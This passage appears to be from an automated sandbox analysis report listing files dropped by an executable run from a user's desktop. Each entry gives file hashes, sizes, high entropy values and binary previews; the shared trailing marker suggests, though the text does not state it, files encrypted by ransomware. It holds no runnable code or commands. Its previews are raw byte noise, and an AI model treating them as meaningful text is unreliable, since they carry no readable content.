          SSDEEP:12:turvjxie7ZqOzWfDVe1z6Y3WhN0l7A5AZ1bDY3jFANj44VLAxKY6fBzmcEIIREiq:3kDwD456s5eAvDY3jmNjkc3EGiTkbD
          MD5:E38FF39C36F19449A9EA42DE3333C753
          SHA1:EB619EF906FA98CC97F6FEB795307A72B1686C9E
          SHA-256:8127BD2A8D339691879F623CB561EE6A982A74AA60524E6739C2047E113D36A3
          SHA-512:48AF879500127BBE1989CEEDB8B23A44C60A824CE3DA4CCA56E418BA08E5B29E564042FB13572745ACEEDED8A3C2A27B1F4659AC214036A4130379ABA7449848
          Malicious:false
          Preview:<?xml.@=.C..W.......I...W...R.0,......u ..P..jC.,....^....>.H..rV..I!.4..2.Q..k.1...Q.Q0Y..].:3.h.@po..mTK.*Z..vR<......e....+....`.....}.p|v.|p......|ab.u.L.K.Li..5'....Y..K".G..N.1.....a..!.C4F..w....b'_...L...^...s.Z...........I#.0....`............6....f*....1...../]:.nd.9.;.5T.....:..3.8.F...OF.......hO..P@1.....z .t?".9t.v.'.C.!<r*Ed..<.Gc.8.....v..zQ...6.^.l.......G)...@.).<d....hZ..;.,....OS......{....S9-..m..0?.HF..Ao....a..4,...e.T|5c....S.....m.V..?...]]})...."..X.. ...u.....h.8.e.RK.&.0.?.q.3._XEq.0..H%]..5.QF@_..F..B<.U.Z...pX.a...F.r....f?.,.z......S\...|.n.s...CL....h...![.4..+...>...U`!O.o.*.R....V.L}..E..5.7....5R.^.....P%.I....l.*.......d.O`...=..Z../....u...g.g.L......".../4k./"#l]45L.,r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):630
          Entropy (8bit):7.599558479642195
          Encrypted:false
          SSDEEP:12:+FVo2JwvIz86Kou18RbCUzx2BM8IIRUbP4TbPJzB2ixpZacii9a:+nf88R2Cx268Iv4XyiTkbD
          MD5:96D469F4F0892BB62FA603A6464694FC
          SHA1:104438E1D6E9EF593421093B1BAD21266CFCA158
          SHA-256:922BD68A5CF8A858BEE3D5A21430F70D6899C9CDE8DB7A7A820967E368D9D7A2
          SHA-512:21704909EF5E14E595284F486FF6D131A7CB97942557693635238371CC06532DC535330E28A4035542607EF1E4E493E70DDB3980D3B9B9E4A044A10E985973F0
          Malicious:false
          Preview:<?xml.......j.0...i....o...t....,)..?..!.Y../Ro1...].y..rl...U......L.......^..$N.g.>..M.=#..8.X.....*.f9/../O+..A..|R........;..M..wb......xg..S..8...n;...;....#F.t..7.s.&R2.Q[w..V6..M.....{.z.........w.93.v...#s..L8..E..&H.H..._l9... :M.&d.a....&(C.b....h..L.k.a..CE.?4.9..u.g....Dl..pq.|..}.*..m..s......L..[f..xA.M...c.`.p..x.a-...9p...i...".<}..a...`g..`..C.T.i.)..y.2..68O..Q.g......kN.B..........iR.&.T..Y@HH......l.T,....^..+..D.`F.o.....$..p...d*...]. ........B.9..$'.?..6..}..GB.Ly.0.l...n.tK}@W...Y.1R....T.g......f..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):851
          Entropy (8bit):7.67596425957998
          Encrypted:false
          SSDEEP:24:a3CyQte8zRhvcmVcOkKJqfZPHT/FByPJnTiTkbD:iQQ8zrWBf1z/jynmiD
          MD5:7A148A82C05D34D4C2D09E8B3ABDCF5C
          SHA1:1242C231DDC9AAB75208FCF36FFFF1AFD54380A5
          SHA-256:C50CE444F677F8E39F208E5FDA5EF27DD0AC2EB22FA07A441A8085FFF0E5E081
          SHA-512:59CE807E110F73991BB3A3FC0B3C9662B7EBDFD05A864D47EE406D9A7E80B571553C0F1ED3AB596F217847E02721343AFE442E06C7DC6512E029C23991A60328
          Malicious:false
          Preview:<?xml$.3.0h..[...7"..-..1...!.k...t.E3.nm}Bi..;..vf.x~un...(..#..H...Nj...X.....hW...R.!..7...p`g2f..l../:.U.[>..2.9.8.}". j....+..%i"E5.:)7_.".C.H..A(..mA"b..'.0..us...5EA[...`vb...@rt..pX..+.R.L4.l.X/..=.~.9.@\h1..4...Ub:....2.....(..E[f8.#..d..xn3.1......%s)yA.h..."......O.<..z`....f.?.&a.sa.!....r.m.<.!.....#w.;$..nA..y>....a.E@ I<...[R0..xd.Y.?...M.V.*...&.....6.._R.......:.s..0/.@.v..PhF.......[\KtZ....y...MK2....}..7...}\....r.Uh"m..KgK5....?..s....D^....f......d..5....:d.....L<._..[."..K..aq..!y.....e|.K...0....'...]hse..y9.r.......%(...)...}...6.Z..X.?.....-..a...C.E........BR. @..D...".........P..2..<.Nc.2....0(..x..g.fq....Z12............U...QF..B.Q...,....2.D.z..RH.&....2.`......T.......dm.p....J);\...i.f?....%}.a...}Pr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):6314
          Entropy (8bit):7.9665233522933905
          Encrypted:false
          SSDEEP:192:9p7w6rNbjKFRtwGXSejx9DAVIkd5VPB5J5/NNuP2vmY:PbR+/tPXbjxABZvNw2v9
          MD5:8B84E4FD9EA22B33BCAB8C9241BBA403
          SHA1:B12E1DD554643EA3AD55352EB366F634A6CB7D4B
          SHA-256:4AC8563F149BCE5282B55E923AD391DBAE9B29ECB89F249249B08D70B45594CF
          SHA-512:8FE9E00ABD3426A443E8386557C3E48D6020C8E6A2AC9B9DE4353A34FF9A0E6CA73037E588FB379D3077CC9D01B85B5D33003EA512E5F85AEE19E56D869242CE
          Malicious:false
          Preview:<?xml..).....w5[....D.=...$_(...Dm??.......%...}8.J..leL.,.vl......E.3...[(.f.x.c#<....x?....?.d."..B$.....J....S.../N.>.....r....Y|..v....p_.HW.'...c.E?.......c3z...(O.f=....v..6]...[}.;....t.._|J.."W..p../.B..,p..x.f..2.R.'..8.i-....JQ..?.......oo..,. ../.i.Z..W....[:(SV.*[.~\.S.Y.-.X..p3).jk...I...N8.=....Xo.{.S.#.....gR`v.Qh..`......+..~.4%.B..5.t.....z.....9...=N!h.O.Rp...5.....z..O1.9.J#..).5...my..@.. 3Q.C....#.U.3T....H..$R\..Z.c...k..v....%zA.....0..#."hI...%"......../..;..tk....@T9..a...y(@?"}.Yc...0.......W.Y.\.....\..W0..C.Ou7&..Y.=.)...(....8.E5....'5.-.......,..y'.W.S..1.!.K..am...........l..\....R;.........2..K.>o.i".@p...z.....(:..I7.0..yJ...R..Y7.......Y..< ....5.....8J..x.<9/..F......6]i..C..2....Ir..bj.-8..D..i%.|.|......'...(.......DO..H.A..R.w...v.&`..'VW"|...m+"....U.).Bu:.....db.........i....mI..H..|..!.\1..q..+ R..P...z.....2.q.......s...n.....J.w..&.@.u.....E5.^hG..tv..2........c.'..=qi...m...u)sm..;Y$.$y...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1029
          Entropy (8bit):7.784935578285297
          Encrypted:false
          SSDEEP:24:7yIDN+MHDFaJQ+CatA2El4miCFMTQKW7GauSeiTkbD:7yIhH2QcMMo6hSbiD
          MD5:E52CE5E7D69023C2D08A85C0DD539F20
          SHA1:5B26DCC8DED2130140E38BC21F35A58C85D6A869
          SHA-256:A2B8365EABC9BD200423DF6F9CB93B2BE45135FA8959DCE2C7E3176D4B21FAA4
          SHA-512:237750531ED8DF6C439DDFD88194F1BB5B1B8C35D25B39B0409063BA8545545F96D4C9185309E9C396FC926D225D7BBBD917DE18C3A2DD0FC857CACED909AAFE
          Malicious:false
          Preview:<?xmlg.6..4./1..#%....*..j..m'.+. ....P.i;..pa..{...............H.T...V..C....Z\g.j...P....F.*.8...I..2..A...l....)].....y....$.8e.....q..6......K.j.U..}......_qa.(.4.|!<j...#.{..K...O;..\.)....H[..|.O.D.1.A...K_*G.\.+W.[N.......t{.=rgm.K..#.F'D./FD..)..W`.4^/rk.C...h...Y..m....8.@.^k.:,.q..Dp)`W0..[Y......;....zTP...(&.#.i..<....H.c].......cc.....C:'$....|Z...............H..Q..N... .....IA.<...u...D....Q..o.*li.t.GUC...v.;......v..gs.X.......+yw._..M.#.o.K.@.D.Cp..<...B.>P].mHK.jS......e.$.Ak;.....tCnV.l....K.g.H%T.......+.y...AQ..........C[..#...Mzp{I,..T.0Ex$.f.<6w....=.$....{......4s.#.W..[......Q.k....X....nI..|...??.............U!..g.^~..w.T.Hj..o.........2.Ig......C...w.@CO.G./X...X.B.NN..l..Y........W...J0trh.....\.T'u~3..^.i..*.....'cR....#>..L.D..../.LT...E.L.y}.......s.v.(...M~..g.%.E..?QL..,......,...^....G.^m{..%.'.G.+c....O...X.n....t.c.sa.......&d.u..p.B.]L....`.C.Q....Cnc.M..1w.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1040
          Entropy (8bit):7.776592636623688
          Encrypted:false
          SSDEEP:24:0Mr+00lWJFkExWdVe7I2obUJwl2iiTkbD:XwdUJDJwl2XiD
          MD5:6294FACD52165BE0D18A12749EBD20B3
          SHA1:33C021E9BDFAAD475015691C0C3088E2650CE7C8
          SHA-256:FCC4637CDD595FCEABA07D54B3151FDC1DBAA4E548BE1FF00A0F8A1B166D070D
          SHA-512:DF11B7E4EF242BD8D9F52B91EBA3D880537501E08652568ACBE027E1DC59C560DEFFD136B735C7804487C56FECCF20D984F889F53DE0F5C963235A6ECEF4D41E
          Malicious:false
          Preview:<?xmll^7..9..9%..EH...5.D...v.....a1F.I.#aVq.YW.x.o....c..b./.0g....#.....#>r....107i..$...Y=.A.]).|...\u..K_..e.....c....E...E....F....c.AK.......O......DHO.t.....7..A...:T.v..<SQ.g.}....D..3.pz.?....(gt0F....#8.5...f.kE%.Y...g..L".C..a..-.>......UC>.u;b..P#.1...[......w.Gk[.8....a.......X:..M7..j.f'.l>..,.H.b.k..a'......R.!.r..r.3)..4..P.d.fb.j.?..a......|6<#..e...r.....S......b..!3JP..v.Y..3.In..j[.i...;|....S....cxM6.b..GIv........p-..xQ.....w.M........&s*c..............m5...w<.^7.b[R.F'|K..K...?.._..4S%.....?..|J>5?.VM.e..;...#.........T.nV_[:...7..&LZ.GU.>.W{....Ax{Hv6.....1..(..gYs.n.:.y..B.../J....d!OzHt"]..>.........8..&................y..l.P....$.<X..W...-......N~.Elq..@E7-..i{.\..a..su. .+#..I..k@)._9B....#..........d....WIY +.........|K.....~......$.^7.:*r.v...(0gA.g..g....%N.*...p...r...6.fL%.a).i....>....o...Hx.i..l[....).[..6..o....UxQ..2...3)X.9..iFH..*+.....o.ZC~.j.....1\.EwOm....WT%.Dc_i...zr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1415
          Entropy (8bit):7.859872803872639
          Encrypted:false
          SSDEEP:24:NNkbjg0JX5u3CVrQ00zzpeyjcrY2MeKqFll8VICQlqioDNtiTkbD:ggcACVM00ZtjC5KClbqyiD
          MD5:CE4BD3346EF2E6ED948E386262DCF679
          SHA1:0602B680F87AA65FFAB76BFADAB1C095E3BE452B
          SHA-256:FED4BB7D362E978E1341A03209EEECB69629AF722DDEBE14F4D8E5AAB5A97BC8
          SHA-512:4155D313E663084130505DAACC0CA51B41CFD7CA9729A4C9F35C46725F220C2B7EA64B9362CAEBFE19B7FA15847074538B999AC1BE464FE65845D6DAC4D5C1A2
          Malicious:false
          Preview:<?xml&j4...&.E.(So.._....35."..<6h...c.C.T...q.P....P7..-..:&.|.)..Y*MA../p.Sk..tqW.s..38..`..Pi..kW[4.y.(..a..P.+.B.F#...BZ....S.@..F....7..dIU...t|.'...v]T......C.@.q#...,D..h.|..=..gc...9..H..<V...y..({..U.%...tG..&.g.e.....7!{..h&..v(........?.......)...se.m.X..?.dk.9GR....}..9..ER.#.j.W.i.e.`."......7......Q...R.....$@.".../.E{.Qn.3../6......~B..'X .[.~y.....$?."j....p*....F.....G..1....+2..*....+..~.....B.Ra...~WG....uJnjE..0.<2=.ZVz...a..h.W...:.. ..~.I.f."..s..IZ:.._..."..pd6....J..?.....JoQ.....W..........1..\{i..:~...I..He.K..]..A.|-.......6 ...|.d.....9.9...:......<..\.....zq..T...u9....W.".o./...6..i......5.^...;._2N.{h.N...M....4.C...:........o.7..nC..z!.......O.7.xeZ*.=Po..;.7..H=<.C..KM./......Q.Y..$m.......<..d-...A.K.$...a..;`...o.H...i...2...8......R...R$.7?u...4...t....jv........C{.....U..yL.[Ie@.}. <W.@.-A!...o.3..t.r6..#....(.S.K..m.......s.|6.lv@.N..../...xG#.]j...W1....y..mV..@......Z.<r.j............j~.f..GBQ..!@.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1073
          Entropy (8bit):7.8328196070611575
          Encrypted:false
          SSDEEP:24:FNEDcnXsGN501OWUcIMlgr2qQ2aDPDoQd047Wy9gqiTkbD:niss80UcgWLvn19OiD
          MD5:3A56610D32D91C946784F270695E63D2
          SHA1:7FCEF33D014760E4EC0643053B16BF2E3E1B0757
          SHA-256:D31A1BA60C821BA9A6C58E041BB6ABC0C7A514348519835424995DC2DE659596
          SHA-512:86EE5E675E6A6565F5B949E3BC11A6BFC5F9345045986E68844C32D2AB3827C7BE96F2B200BAC9D58321C157D796E8746500EA80729997EA1229D8F1DF1B4BC6
          Malicious:false
          Preview:<?xml..7..+..&u...#...2.s......Q{.Ewf`&+u....P..*n.n..}...D.<.@.k)......Z..8S.....7..B...>... ....iRg....-o.p..Z.}......yt..#...AR..uA".....B.4..6...L....{Gn.zS.=.*.7...........r.@...XT.....H.A.7l...F..R.$....i..}......5...R....2..7..@%.a.>.....z.uH.e..:.".0...._........ .uny#u.]x..q=.F.Y." .h[..mT.hJn`m.J.a.v..0.9.N^........:...6b...8.R..,.m..... A\fY.....xX.(+..O......i..O...K.F.rD..v.i..[..B.H.;..|.8....@.G....:........4).q{.|...%..D.hp...V.....8..J.g..i..X..e.c..c./.....b.!..O.k....n.......2..t.-.&...sS.%....=!8U.....Z;.............x./.....Ij...}G....qG.k..2.VP-.....Y.[....'c.l.......z..wR...[.;.n!...5.......,p...p..i5...K......eI....g.<._..T..Q.....?..5.WXd.......N2T.8t(...C....\.d,.-..H.B....-..9="..Z..r.G...C..:h.Y./$7..e...dY1F..N...."/}...u..W..tyIe.....A....j....6....^Y...M.I....@...j....=..etN...f....`.......M.~=.Vi.O.3g<..H.....1..z..<..[.:%'.d..E,.l...{......v._X..5G.,...}.c.^..Bi........p...4.8...PLY...Y...........FP.r6yxl
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1154
          Entropy (8bit):7.832751304569726
          Encrypted:false
          SSDEEP:24:bb5RTb1OiaUn4eZ2kxza8oowrFcyb8nTnXpqQ+RbkxacAy1RN2iTkbD:v7EP4fWhFz8rAQ+RbkcxARNziD
          MD5:D5DBBDB52189A80EF7E0EC30B55D4AEE
          SHA1:D430D3A4A2D5D07084575A4EBCE687E2C1101B8E
          SHA-256:51B7985B61F128C930D48FCEF9DE341489A3921112A5979BF6192E458BEA46CE
          SHA-512:7440D6DC995F2AC14F1112DA1A5FB19A653DD27A4C9372D3C2942B38A5081C91F9EFD908374C83EF155CE7E895845243B370BBC4D058F835E5D9BF870A005CC1
          Malicious:false
          Preview:<?xml`.H.^........'.7..2....X.M...mO3.I...O6)..N.. |Ol..sw2.Y*.C..ZU...........;...>..{...Z'.f.d./..tsp.V"..7...w........^..x8.E...$......w.H.thm...U....[.f...l...`..t...X....e1.......n?.`.~-..gqG..-3a....C.3|...|..T!$..J..m[...|W.q.k..)....4.....-.C....$<9...D.Tq...D.r...''..C.....".>.....q7.`.BD..a....I....[..3}"b.B.Q.p...i...D#...}HB..F..F..Vuf.w...n.'......OG?.........B&...A...hX.h....j.1.Y...y.o..B.v..]..d..Z..r..AQ.s.>........,.O..t....N..S...Z)h0.:..H.'...Tc..b..C.q......+.PT.:..A...Op9<*..~.....A.H....e.>...w....=(h.Q...w;.C\..'.....cA.........]...;8=q.M:..2.H.~h....!.X.K.. .).VK.y...,B.....}.........E..fh...]..$.w..D@........7.(...vQ..O_......ahX.G0......6.......R5..z..O..~b...@...QW..q%u..g1..K.4.A..[.|{.q..;.fJ....'...>.8 ..zC...P..^..}.G...........g.i.D.b.<.H..[xC5..R..8.O.;...(.t.`..O.j.b.....c.r.<_........M........).m?$..I..Qt.....p.6.`...a ....p8}.q..]......j.x.Y...M.9...j.0..Q.MO6._g...`...r.[..>i...oh.M;.. ..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1902
          Entropy (8bit):7.894008061737583
          Encrypted:false
          SSDEEP:48:Cr9hbKstSwXay/llhFN4Tcsp1/IgMoh1BqC5UzKDic1iD:CL2skwXaSllN4AspApC+zKGck
          MD5:EA9A9F655ABBE6547C75BAE6E3E5998C
          SHA1:66EDDCA1FD78EC0059881B4C20C52F2F9825D154
          SHA-256:E79A7B58D1A49D93C2BE9CDF7B1F9CD532DFD9445855F9640D16FFF713584FC0
          SHA-512:5F5E5968298A98373641933DC8AEA52D94D9D9501BA1D26BB33F494D8666FC3332DDC0D9272DD57444AA47B7B6442E935147E6B494988F9E47E420E10C9B297E
          Malicious:false
          Preview:<?xml.Y..}....2...>J....U.<....<Z..*.Y...}.!....A.HsZ..h..=.i. y...r....a.oz\.8.uc:.......-J........:.F........n.:..1.......^.....N.4.uZ..\EA....].`..g<.Z....0>...d....+.+.#_.<.......].=..Z......{...\.M..8..Z......!._.\..#G.......pQ^.#.O2..4.y..v.R..T...).<R...Ow5.X.!,....'..Pr8fL^.W.-...X<..a.D....|?b.."").....};..S...9..]. ..n.|...mZ.....o..j@..*...s....Z.D.0+......z......C*..".k.I..8<.A-T.....".&......L..P]*.|5.>..4..<..%..H...sFk......Py..8....O.l&{2.JT...:.6..(...Tb.........c..O4F8..CBFq4..1..X....B...eq.....zP..>.......e...@g.|.;..`...gp.q......{.0....D..0.....:/0...m.o]&..|...~.....#d.C...e0....W...BuS@.x...aF.........O.$.f...+....R.....w4$h\4.g[9...}......?w..p.b4V......BZ.......(aQZ..]...T....Cd...S...0.:.=...3@.K}1>.4....W....c."7.v.h..g.........`ClM..]......a.(D..W>\`b...EbWne5q...S.....2...?>f".....U....T...s.b.F`......6.xlr...Y..._....jO.7.t...+.....q..=.A..O..u.Wj.....g.Ik6....)~9..K .D.,Y%.._%.........
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):712
          Entropy (8bit):7.662291259608819
          Encrypted:false
          SSDEEP:12:YdOji6D+P+h0dHgFV7iwlIH432+IByW09xlimK06cSo+V/MhifKwKPY4FggUJliq:YdyiDxdahKfByW093/icfg+YCUJliTkX
          MD5:8B4E4D68EB2FED87F67A9B6443A1ACF0
          SHA1:2D8493B492F1D69C411DA339F325EDD151E50591
          SHA-256:D3B63AFB3F843A1691E10E3E81EF27B59DB327D6A1545506679E113CC7FC6046
          SHA-512:FD5A9404DFBE5095351C3589983A964964596D2CFFF27570400910BACA0B201344549835569D463EB6AB5EEF3E586832D297CDAE98341C7AFE0EAA78896A825A
          Malicious:false
          Preview:<?xmle.&.!c....G..H6....?C..3$..2.b.,GI..;~......)..IJ.r.g....g......(-.2..n....M.N...h..-..O......5.. x4.....l.+..;.-.@.K.l.?.T.N.......%'..d.....8.......I.i../..P..=.D...yj.(.0....|.B....]v.]u.U...S...z.2. 1. ...a..7..N."....k..B...x2....<.=[....E7c.0G..]j.@EYe..RSL..> 35C.._P.T.....O)... .R.l..^L.....i..)....P....S.e.C....Y....p..g.@.i..~...........E7.4bn\Y...T.E.9&.......[K{.i. .?". ].z...DX..5..3-e.>....^..).H0.t.}D.Nh..<.v.$<Y[....f.3Q.....(.O)Q.].._i.....V...,....lMG,.?=...D0(..=.6L..,.d..tm..%}..n!.8.0.....R.\p.V....N.{.R....f.....1. ...b..1w+.._.[..2.......X.....r......b'q.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1707
          Entropy (8bit):7.864059176272929
          Encrypted:false
          SSDEEP:48:1yVSeLBOicKQMOfBjRfkN8P/ICQ+d655KPiD:8vopFftYY/PG53
          MD5:398E14C20C5229C837A6E890A6559B9E
          SHA1:4A47CD249CCD77AC404BA6DBBFF7C0A8B7526305
          SHA-256:51F22877DCE1D76DCC8B12EFB23A0DD44CCE992E96F020F680F9124BA1BA59C5
          SHA-512:72406C24CBB14AC107ACE1D251CB2FAC9AFE0C420A2C34E963267A079EB7B27F8F713EF434157571DF17810AE3A6B76E7588F2241B51129A5B834F7A179F8151
          Malicious:false
          Preview:<?xml..h.{..(.j..'n.E:XE....LP..Z.b,G......c.s.T....p....>:..rLw.'..H..j..>~9Z.#$.:.m@........l{...-f.>.xm.t|3~..........?.7J..P~.h@.X...iw.b.u..2...u...\!.c..X...,..|.,...8.W8...g......<..k.v..,~....T.b.5..W..w.Ap...]....7..D.].8.0.,....RXz..{.)y...0&_...#..[..QVM..-.2*#.....Rd..P.....&EZ.b..,..7$...M:.!..5u.%#.......W...>.._.........gb...].......m.=..A.$.....Ci.......O...a.....:`.V.9....b.ak=.S...V..<...C........PU4|..*...D..?........].A.-..kZ^.M...;E.b.....Y]...t/.#..^v.U.X.......dR.>,.$2uti.o]g....r..%....`....V.S...4...4q......OY:.?..@\.O..)]$X%..v.{.E).iC~...y...U......k`)"..f..&...u1.#..0.... #.E.......\..L.BN9.HT...p.PE...[...C..*-.4j@~.#\J..e.It.......o...P....r.m.%[u..e..,..gu.$..W.o..T./T..H.@c....T_.....0.[..f.T"..r....*M..1.......:^D7K....r*.*.w...%.}.'.a.A.d...F.AF&.<..lz. .K./v.....R...3.mbt8...}"..o.0...aJ..'.C.[h.4.9...M..A..+.N+.d.g..!.W.#..|OJ3..wd...&.>..0..C..iy\..........N..c|...M.{.3Y$&G.T...NNu..%..\/.&9.7+"W.+.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2111
          Entropy (8bit):7.926852680009129
          Encrypted:false
          SSDEEP:48:lTwefS7G63i9LuZwjC8eHIFYRMtHDlYZqx2HqUDSiD:uesS9i87BDlY02HqUh
          MD5:96FA4560EC15C0543C9135A87E577767
          SHA1:E17FF5BFC8190A0F8F0B2B1D5BAA4C400ECB5F4A
          SHA-256:7B925B7F0D4989E3D9F4736556BABC26FEF14003B87B093EA861940267653216
          SHA-512:CA37020F211F31BF2F929B3E394058B42337C6A7B53CCCE2F9E15F9D751D257572BEA4199F5D57563605E87F8E3C76B638B5C951EFB9C9FBAC0A6AA638A625A7
          Malicious:false
          Preview:<?xml.....G...W...[..k..~.<.....lE.WS{.....WVv|........zi.....C....'E....JX.......B............Q.K.......fQ.-v4.....Xr.z....C.....6...r...w>..........F.4.......,..)=..(.....>@..X>.zS..N.i=y......-v...nU.....;....XW)[.Tx..s.....28.i2.-4{.s.bk.....;..........a.9..A..HOd..)L...Z.f..d...i(.<........E....AvSn......H...`.....@.`..../..E...3.,........ 3.".`.a.7...n.\5M......h..".....0.(].D5..qR..%.k#.w.E.h.nv.H..pQ|.............(...U.i..kj..!..@..Y .:f..\......._..........T.b.....8..z........ ..:.?m.5s...1.+`.Z{...}'c%o,#.j.....N.yUJo.Y.t...?. Q.......#..,.....q..FV.Lb1h..t.C..!./...O]....|..*.......U...m.....2%...0.5.z..._#.5~...%.......j.bo2~...[./.QPYTa@..vT......l.i..Lq.+n9$.......+..4.s..../..d..d.Fw...4D.T.Zj.?B..}...............[s.".<...`Jw.e.....E..IEv,.R.x.L.<a!.=.v.m.tS.4....K(<..........i..\[.].\.1..........ChX<.eqt....8..L..u-rUT\.E#.?.9eb^...(.g#..c.;'L..\.~<.B.dN?.C..6..J..g.-....C\....Q......PN?..E......L....Wt......o...4q.g.W....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1732
          Entropy (8bit):7.894859879117777
          Encrypted:false
          SSDEEP:48:jl/TbpKvuiKmdOF2lgbBSIQjG0c7an1fACPKYiD:xLtMuiKEO0lgNSdPn57Kn
          MD5:7C7FC8537E36A11E9B927ADB11FA3BBE
          SHA1:328045F4C07FE5955B5AA591EA89B58DB758BCA6
          SHA-256:0437FFE7ADD1A60B57517C425582FAD67C218C520888465B20824117A246E557
          SHA-512:1880E7794B944FAEA8A961692DF35F0B7DC120B5E311A687DDDD2AA46B6B5D9B70484BBF7EEA41F43CA38B48D0D5DC30CA4863EA4E55343BECDDA57BDA83C1E8
          Malicious:false
          Preview:<?xml.........J...........f.B%...NjU..B.....&6.!..o~...Q....w}.sQg.....&n.x=..%oD`+.R....}.B&.....3...'.yy.&.B..(..l.....H.0M.z.gz........F..+......:!S....n!.<....h...3.U...a.J..e....<.QH.R...Z.6.]Nm....;.Wm."..1m.>D...f.%. I.h.. .....k...k..6...... .7i\zg..w./.....i........1.......;rp..G'.A.........a...RV..7.G..v".s .-.,d.*..r..l5.rw6.5.d.}...nC.....M......]....{.....!p..j.H..8.?....m.]U..p......7......*.!i.4......$.....{hO.P:....R..W...Z...,.....P.K...:./T...y,....c.S.J....P.r....T.....{p._....>...A...b.8Qv......K....gD...".4..X&.>...VCn1...K...~/...k..F...(~Vgl.Bj.~...N..&...=..n..!..m..L..:.|.....o.....s...g....En;.<.m..&....b....{G.p;j..b..X.a.......-...Y..5K...7..v.b..c..e.......6V....A..y=".{F.8....yk..!z.......3..]t....~oD ..^...6.....5...~.....m.Up..".>?.g..dCKU...^vu.q........Px.N..w}t.y...=J....%.x.;;5<.9..'h....Vq.....Q|.%BI.3Z...A.E"..~...#Zd.)...P......|R.fX....^....X..g.U.-.......r8.G..T.U\...T...`.)x..-.J
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):935
          Entropy (8bit):7.747096018552168
          Encrypted:false
          SSDEEP:24:LGn+GHPTtCkhOV5ONKSGDx83Bsi0XAO/41vnEQGHYcSdQiiTkbD:Lg5H7tCkhY04S+8l0F/41MggiD
          MD5:FA37A610B7296ACAB5F982ECEAAFE346
          SHA1:47B0793123D1C6E23F4B620C316B6D765F6166D5
          SHA-256:44EB78ADE9324133B34F6138E37840FA1A96B138A4322B2BBEF8F9EBA0043B35
          SHA-512:8C3FE61FC84AAF8DD4766ABD15D9264829C4A3AE3A28255575C0507931F1B847035EE740C9ECCC7C770AF66035EE12D323509AEFF453BD1ED82C746D8F1750CF
          Malicious:false
          Preview:<?xmlvKeI..m..Uw.....D..y.......<.......2... G....t-Gt..*5f.....K...W............p..;_.M....n.,X...P....:.5.....^.gd..........k..l...<9I*.......i.......]:.."...Ep............e......G~..\.....,^J.8.#....9.&.%........`.D.,2......XoPd..."Wv..Lce.z.c..L.^'W..0.@.....I.#.D,\jR.....6...q........KC...J...[.\.Vxf...{....i.o].o....D...,z.$.N.T.r<a...t. `.......>..6-.E..i..sA.'.-}d.0..^W(.$`.R.<..;.C.:,...Z.}......[....i..pf..*v..M....^.^....%<....C..C..2.}.,.._R........._.......u..>2p.~].....,B.L..,o)....S..?.X.X....9. h.6...+.69Hl%g57....>........-..>7..f.^K}..WN$...ouz]..G.Zh..3..G...rX\N5.9.....@$.H.t.$,.F.m.b....X...>.u....1W;...z...7..{........Q71..PJ:,.~...\.l....'.L..k. b...X....B.6.R4?G..dM..+..P....|.h...........?@...._m.....ew.m..e...R.Z..+.O....W.Kw..a.................G:..`.f.......?..{.'[xZ..Br6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):980
          Entropy (8bit):7.771734054134757
          Encrypted:false
          SSDEEP:24:7hCvhBJqTaxVP0OyrJeGqBi+ExX9r6RlF/VCphSiTkbD:7+1aOyQlxa62LniD
          MD5:A2DC795FB63D5A1E03F4116F8FC3F634
          SHA1:E054D535E6BA72327BBA7A257D0BEAA561E4BF06
          SHA-256:7E3273D6AD01BCA3BF1F5ACEB689C92F08A76B559FEA2AEE5352C9CBCA700ED9
          SHA-512:154DC97A914A7D0FCAF6BD188C2FB8522A37D779D5F8C7228916ADEE6151B8BB3B4D322EDAF5C59B4AEA001A0A535A12C6F0F6EC35ADCA5BF6A79FBC396AC227
          Malicious:false
